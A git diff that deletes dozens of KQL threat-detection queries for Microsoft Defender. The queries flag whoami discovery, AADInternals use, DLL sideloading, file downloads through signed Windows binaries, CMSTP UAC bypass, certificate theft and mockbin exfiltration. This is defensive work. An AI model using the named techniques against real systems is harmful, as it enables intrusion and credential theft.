a/Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov -// Date: 2022/01/28 -// Level: high -// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors -// Tags: attack.privilege_escalation, attack.discovery, attack.t1033 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller") \ No newline at end of file diff --git a/Discovery/Whoami.EXE_Execution_With_Output_Option.kql b/Discovery/Whoami.EXE_Execution_With_Output_Option.kql deleted file mode 100644 index dfb76c22..00000000 --- a/Discovery/Whoami.EXE_Execution_With_Output_Option.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/28 -// Level: medium -// Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use. -// Tags: attack.discovery, attack.t1033, car.2016-03-001 -DeviceProcessEvents -| where ((ProcessCommandLine contains " /FO CSV" or ProcessCommandLine contains " -FO CSV") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")) or ProcessCommandLine =~ "*whoami*>*" \ No newline at end of file diff --git a/Discovery/Whoami_Utility_Execution.kql b/Discovery/Whoami_Utility_Execution.kql deleted file mode 100644 index 674c5dcc..00000000 --- a/Discovery/Whoami_Utility_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/08/13 -// Level: low -// Description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation -// Tags: attack.discovery, attack.t1033, car.2016-03-001 -DeviceProcessEvents -| where FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe" \ No newline at end of file diff --git a/Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql deleted file mode 100644 index 5a91ee73..00000000 --- a/Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/23 -// Level: high -// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. -// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/Abusable_DLL_Potential_Sideloading_From_Suspicious_Location.kql b/Execution/Abusable_DLL_Potential_Sideloading_From_Suspicious_Location.kql deleted file mode 100644 index 51893a0d..00000000 --- a/Execution/Abusable_DLL_Potential_Sideloading_From_Suspicious_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/07/11 -// Level: high -// Description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations -// Tags: attack.execution, attack.t1059 -DeviceImageLoadEvents -| where (FolderPath endswith "\\coreclr.dll" or FolderPath endswith "\\facesdk.dll" or FolderPath endswith "\\HPCustPartUI.dll" or FolderPath endswith "\\libcef.dll" or FolderPath endswith "\\ZIPDLL.dll") and ((FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Windows\\Temp\\") or ((FolderPath contains ":\\Users\\" and FolderPath contains "\\Favorites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Favourites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Contacts\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Pictures\\"))) \ No newline at end of file diff --git a/Execution/Active_Directory_Kerberos_DLL_Loaded_Via_Office_Application.kql b/Execution/Active_Directory_Kerberos_DLL_Loaded_Via_Office_Application.kql deleted file mode 100644 index 354e0360..00000000 --- a/Execution/Active_Directory_Kerberos_DLL_Loaded_Via_Office_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Antonlovesdnb -// Date: 2020/02/19 -// Level: medium -// Description: Detects Kerberos DLL being loaded by an Office Product -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\kerberos.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/Execution/Active_Directory_Parsing_DLL_Loaded_Via_Office_Application.kql b/Execution/Active_Directory_Parsing_DLL_Loaded_Via_Office_Application.kql deleted file mode 100644 index fb608553..00000000 --- a/Execution/Active_Directory_Parsing_DLL_Loaded_Via_Office_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Antonlovesdnb -// Date: 2020/02/19 -// Level: medium -// Description: Detects DSParse DLL being loaded by an Office Product -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where FolderPath contains "\\dsparse.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/Execution/Add_Insecure_Download_Source_To_Winget.kql b/Execution/Add_Insecure_Download_Source_To_Winget.kql deleted file mode 100644 index 65afca78..00000000 --- a/Execution/Add_Insecure_Download_Source_To_Winget.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/17 -// Level: high -// Description: Detects usage of winget to add a new insecure (http) download source. -Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) - -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add " and ProcessCommandLine contains "http://") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") \ No newline at end of file diff --git a/Execution/Add_New_Download_Source_To_Winget.kql b/Execution/Add_New_Download_Source_To_Winget.kql deleted file mode 100644 index cc0181f1..00000000 --- a/Execution/Add_New_Download_Source_To_Winget.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/17 -// Level: medium -// Description: Detects usage of winget to add new additional download sources -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") \ No newline at end of file diff --git a/Execution/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql b/Execution/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql deleted file mode 100644 index 2fc70f43..00000000 --- a/Execution/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/17 -// Level: medium -// Description: Detects usage of winget to add new potentially suspicious download sources -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" \ No newline at end of file diff --git a/Execution/Add_Windows_Capability_Via_PowerShell_Cmdlet.kql b/Execution/Add_Windows_Capability_Via_PowerShell_Cmdlet.kql deleted file mode 100644 index bc9b3253..00000000 --- a/Execution/Add_Windows_Capability_Via_PowerShell_Cmdlet.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/22 -// Level: medium -// Description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. -// Tags: attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains "OpenSSH." and ProcessCommandLine contains "Add-WindowsCapability" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/Application_Removed_Via_Wmic.EXE.kql b/Execution/Application_Removed_Via_Wmic.EXE.kql deleted file mode 100644 index 4ef64bab..00000000 --- a/Execution/Application_Removed_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/28 -// Level: medium -// Description: Uninstall an application with wmic -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where (ProcessCommandLine contains "call" or ProcessCommandLine contains "uninstall") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Execution/Application_Terminated_Via_Wmic.EXE.kql b/Execution/Application_Terminated_Via_Wmic.EXE.kql deleted file mode 100644 index e0c3848d..00000000 --- a/Execution/Application_Terminated_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/09/11 -// Level: medium -// Description: Detects calls to the "terminate" function via wmic in order to kill an application -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "terminate") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Execution/Arbitrary_Binary_Execution_Using_GUP_Utility.kql b/Execution/Arbitrary_Binary_Execution_Using_GUP_Utility.kql deleted file mode 100644 index efb673dc..00000000 --- a/Execution/Arbitrary_Binary_Execution_Using_GUP_Utility.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/10 -// Level: medium -// Description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables -// Tags: attack.execution -DeviceProcessEvents -| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(((ProcessCommandLine contains "\\Notepad++\\notepad++.exe" and FolderPath endswith "\\explorer.exe") or isnull(ProcessCommandLine) or InitiatingProcessFolderPath contains "\\Notepad++\\updater\\"))) \ No newline at end of file diff --git a/Execution/Arbitrary_Command_Execution_Using_WSL.kql b/Execution/Arbitrary_Command_Execution_Using_WSL.kql deleted file mode 100644 index caf25951..00000000 --- a/Execution/Arbitrary_Command_Execution_Using_WSL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/10/05 -// Level: medium -// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --exec" or ProcessCommandLine contains " --system" or ProcessCommandLine contains " --shell-type " or ProcessCommandLine contains " /mnt/c" or ProcessCommandLine contains " --user root" or ProcessCommandLine contains " -u root" or ProcessCommandLine contains "--debug-shell") and (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl.exe")) and (not(((ProcessCommandLine contains " -d " and ProcessCommandLine contains " -e kill ") and InitiatingProcessFolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/Execution/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql b/Execution/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql deleted file mode 100644 index 124d7a9b..00000000 --- a/Execution/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2023/11/09 -// Level: high -// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IMEWDBLD.exe" or ProcessVersionInfoOriginalFileName =~ "imewdbld.exe") \ No newline at end of file diff --git a/Execution/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql b/Execution/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql deleted file mode 100644 index f28e5897..00000000 --- a/Execution/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2023/11/09 -// Level: medium -// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\msedge_proxy.exe" or ProcessVersionInfoOriginalFileName =~ "msedge_proxy.exe") \ No newline at end of file diff --git a/Execution/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql b/Execution/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql deleted file mode 100644 index 03309431..00000000 --- a/Execution/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: medium -// Description: Detects usage of "MSOHTMED" to download arbitrary files -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSOHTMED.exe" or ProcessVersionInfoOriginalFileName =~ "MsoHtmEd.exe") \ No newline at end of file diff --git a/Execution/Arbitrary_File_Download_Via_MSPUB.EXE.kql b/Execution/Arbitrary_File_Download_Via_MSPUB.EXE.kql deleted file mode 100644 index 6f5fc727..00000000 --- a/Execution/Arbitrary_File_Download_Via_MSPUB.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: medium -// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSPUB.exe" or ProcessVersionInfoOriginalFileName =~ "MSPUB.exe") \ No newline at end of file diff --git a/Execution/Arbitrary_File_Download_Via_PresentationHost.EXE.kql b/Execution/Arbitrary_File_Download_Via_PresentationHost.EXE.kql deleted file mode 100644 index 3f3dd72d..00000000 --- a/Execution/Arbitrary_File_Download_Via_PresentationHost.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: medium -// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe") \ No newline at end of file diff --git a/Execution/Arbitrary_File_Download_Via_Squirrel.EXE.kql b/Execution/Arbitrary_File_Download_Via_Squirrel.EXE.kql deleted file mode 100644 index b4580a08..00000000 --- a/Execution/Arbitrary_File_Download_Via_Squirrel.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community -// Date: 2022/06/09 -// Level: medium -// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) - -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains " --download " or ProcessCommandLine contains " --update " or ProcessCommandLine contains " --updateRollback=") and ProcessCommandLine contains "http" and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe") \ No newline at end of file diff --git a/Execution/Arbitrary_MSI_Download_Via_Devinit.EXE.kql b/Execution/Arbitrary_MSI_Download_Via_Devinit.EXE.kql deleted file mode 100644 index 8441648d..00000000 --- a/Execution/Arbitrary_MSI_Download_Via_Devinit.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/11 -// Level: medium -// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system -// Tags: attack.execution, attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains " -t msi-install " and ProcessCommandLine contains " -i http" \ No newline at end of file diff --git a/Execution/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql b/Execution/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql deleted file mode 100644 index c2a5c681..00000000 --- a/Execution/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sreeman -// Date: 2020/03/13 -// Level: medium -// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. -// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial_access -DeviceProcessEvents -| where ProcessCommandLine contains ".SettingContent-ms" and (not(ProcessCommandLine contains "immersivecontrolpanel")) \ No newline at end of file diff --git a/Execution/Assembly_DLL_Creation_Via_AspNetCompiler.kql b/Execution/Assembly_DLL_Creation_Via_AspNetCompiler.kql deleted file mode 100644 index 76fa5460..00000000 --- a/Execution/Assembly_DLL_Creation_Via_AspNetCompiler.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/14 -// Level: medium -// Description: Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider. - -// Tags: attack.execution -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe" and (FolderPath contains "\\Temporary ASP.NET Files\\" and FolderPath contains "\\assembly\\tmp\\" and FolderPath contains ".dll") \ No newline at end of file diff --git a/Execution/Base64_MZ_Header_In_CommandLine.kql b/Execution/Base64_MZ_Header_In_CommandLine.kql deleted file mode 100644 index ab64782f..00000000 --- a/Execution/Base64_MZ_Header_In_CommandLine.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/12 -// Level: high -// Description: Detects encoded base64 MZ header in the commandline -// Tags: attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains "TVqQAAMAAAAEAAAA" or ProcessCommandLine contains "TVpQAAIAAAAEAA8A" or ProcessCommandLine contains "TVqAAAEAAAAEABAA" or ProcessCommandLine contains "TVoAAAAAAAAAAAAA" or ProcessCommandLine contains "TVpTAQEAAAAEAAAA" \ No newline at end of file diff --git a/Execution/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql b/Execution/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql deleted file mode 100644 index 75e530fc..00000000 --- a/Execution/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jimmy Bayne (@bohops) -// Date: 2024/01/02 -// Level: medium -// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe -// Tags: attack.execution, attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "-- " and ProcessCommandLine contains "collect") and (FolderPath endswith "\\dotnet-trace.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-trace.dll") \ No newline at end of file diff --git a/Execution/BloodHound_Collection_Files.kql b/Execution/BloodHound_Collection_Files.kql deleted file mode 100644 index 2dd9a6ed..00000000 --- a/Execution/BloodHound_Collection_Files.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: C.J. May -// Date: 2022/08/09 -// Level: high -// Description: Detects default file names outputted by the BloodHound collection tool SharpHound -// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001 -DeviceFileEvents -| where (FolderPath endswith "BloodHound.zip" or FolderPath endswith "_computers.json" or FolderPath endswith "_containers.json" or FolderPath endswith "_domains.json" or FolderPath endswith "_gpos.json" or FolderPath endswith "_groups.json" or FolderPath endswith "_ous.json" or FolderPath endswith "_users.json") and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath endswith "\\pocket_containers.json" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft."))) \ No newline at end of file diff --git a/Execution/Blue_Mockingbird_-_Registry.kql b/Execution/Blue_Mockingbird_-_Registry.kql deleted file mode 100644 index 8d23eb90..00000000 --- a/Execution/Blue_Mockingbird_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Trent Liffick (@tliffick) -// Date: 2020/05/14 -// Level: high -// Description: Attempts to detect system changes made by Blue Mockingbird -// Tags: attack.execution, attack.t1112, attack.t1047 -DeviceRegistryEvents -| where RegistryKey endswith "\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll" \ No newline at end of file diff --git a/Execution/CLR_DLL_Loaded_Via_Office_Applications.kql b/Execution/CLR_DLL_Loaded_Via_Office_Applications.kql deleted file mode 100644 index db543222..00000000 --- a/Execution/CLR_DLL_Loaded_Via_Office_Applications.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Antonlovesdnb -// Date: 2020/02/19 -// Level: medium -// Description: Detects CLR DLL being loaded by an Office Product -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where FolderPath contains "\\clr.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/Execution/CMSTP_Execution_Process_Creation.kql b/Execution/CMSTP_Execution_Process_Creation.kql deleted file mode 100644 index 32254f8e..00000000 --- a/Execution/CMSTP_Execution_Process_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nik Seetharaman -// Date: 2018/07/16 -// Level: high -// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution -// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\cmstp.exe" \ No newline at end of file diff --git a/Execution/CMSTP_Execution_Registry_Event.kql b/Execution/CMSTP_Execution_Registry_Event.kql deleted file mode 100644 index fc5cd431..00000000 --- a/Execution/CMSTP_Execution_Registry_Event.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nik Seetharaman -// Date: 2018/07/16 -// Level: high -// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution -// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001 -DeviceRegistryEvents -| where RegistryKey contains "\\cmmgr32.exe" \ No newline at end of file diff --git a/Execution/CMSTP_UAC_Bypass_via_COM_Object_Access.kql b/Execution/CMSTP_UAC_Bypass_via_COM_Object_Access.kql deleted file mode 100644 index b950101f..00000000 --- a/Execution/CMSTP_UAC_Bypass_via_COM_Object_Access.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nik Seetharaman, Christian Burkard (Nextron Systems) -// Date: 2019/07/31 -// Level: high -// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65) -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001 -DeviceProcessEvents -| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe" \ No newline at end of file diff --git a/Execution/CSExec_Service_File_Creation.kql b/Execution/CSExec_Service_File_Creation.kql deleted file mode 100644 index 84508a03..00000000 --- a/Execution/CSExec_Service_File_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/04 -// Level: medium -// Description: Detects default CSExec service filename which indicates CSExec service installation and execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceFileEvents -| where FolderPath endswith "\\csexecsvc.exe" \ No newline at end of file diff --git a/Execution/Certificate_Exported_Via_PowerShell.kql b/Execution/Certificate_Exported_Via_PowerShell.kql deleted file mode 100644 index 3d1a911f..00000000 --- a/Execution/Certificate_Exported_Via_PowerShell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/18 -// Level: medium -// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. -// Tags: attack.credential_access, attack.execution, attack.t1552.004, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "Export-PfxCertificate " or ProcessCommandLine contains "Export-Certificate " \ No newline at end of file diff --git a/Execution/Change_PowerShell_Policies_to_an_Insecure_Level.kql b/Execution/Change_PowerShell_Policies_to_an_Insecure_Level.kql deleted file mode 100644 index 51b9c6c2..00000000 --- a/Execution/Change_PowerShell_Policies_to_an_Insecure_Level.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/11/01 -// Level: medium -// Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag. -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "Unrestricted") and (ProcessCommandLine contains "-executionpolicy " or ProcessCommandLine contains " -ep " or ProcessCommandLine contains " -exec ") \ No newline at end of file diff --git a/Execution/Chromium_Browser_Headless_Execution_To_Mockbin_Like_Site.kql b/Execution/Chromium_Browser_Headless_Execution_To_Mockbin_Like_Site.kql deleted file mode 100644 index 63468599..00000000 --- a/Execution/Chromium_Browser_Headless_Execution_To_Mockbin_Like_Site.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/09/11 -// Level: high -// Description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data). -// Tags: attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (ProcessCommandLine contains "://run.mocky" or ProcessCommandLine contains "://mockbin") \ No newline at end of file diff --git a/Execution/Cmd.EXE_Missing_Space_Characters_Execution_Anomaly.kql 